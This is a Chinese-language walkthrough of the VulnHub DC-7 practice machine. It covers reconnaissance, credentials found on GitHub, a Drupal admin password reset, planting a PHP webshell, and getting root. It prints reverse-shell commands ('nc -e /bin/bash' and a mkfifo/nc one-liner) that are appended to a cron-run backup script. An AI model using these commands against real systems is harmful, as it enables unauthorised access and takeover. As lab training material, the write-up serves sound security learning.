DC-7靶机实战练习
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip
环境:VMware 15虚拟机软件
DC-7靶机IP地址:192.168.146.138
Kali的IP地址:192.168.146.130
文章目录
第一部分 信息收集
第一步 扫描主机
[nmap -sP 192.168.146.0/24]
第二步 扫描端口
[nmap -sV 192.168.146.138]
第三步 收集网站信息
[whatweb http://192.168.146.138]
( 使用Drupal 8搭建的网站)
第四步 访问80端口
第五步 收集@DC7USER信息
发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页,发现一个GitHub的链接
[ https://github.com/Dc7User?tab=repositories]
[ https://github.com/Dc7User/staffdb]
第六步 下载源码 收集文件信息
dc7user
MdR3xOgB7#dW
第二部分 漏洞查找
第一步 ssh登录dc7user账号
[ssh [email protected]]
第二步 查找文件
[ls]
[cat mbox]
[cd /var/scripts]
[cat backups.sh]
第三步 Drupal重置网站管理员密码
[cd /var/www/html/]
[drush user-password admin --password=“qweasd”]
第四步 登录admin账号
第三部分 漏洞利用(Drupal 8文件上传漏洞)
第一步 收集Drupal 8信息
[ https://www.drupal.org/project/php]
[https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz]
第二步 配置php代码
在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,
第三步 写入一句话木马(也可以上传其他可利用的木马文件)
修改"welcome to dc-7"–>选择php编码–>写入一句话木马–>保存
第四步 连接到靶机(也可直接操作不用反弹到kali)
第五步 反弹shell到kali
[nc -e /bin/bash 192.168.146.130 9999]
第四部分 提权
第一步 进入交互shell
[python -c ‘import pty;pty.spawn("/bin/bash")’]
第二步 查看可利用文件
在/opt/scripts目录下的backups.sh脚本文件所属组是www-data
第三步 当前用户 是www-data
第四步 获取root权限
写入反弹shell代码到backups.sh脚本文件中,并在kali监听777端口,等待计划任务执行,稍微等待后成功getshell
[echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.146.130 4567 >/tmp/f” >> backups.sh]
[cd ]
[cat theflag.txt]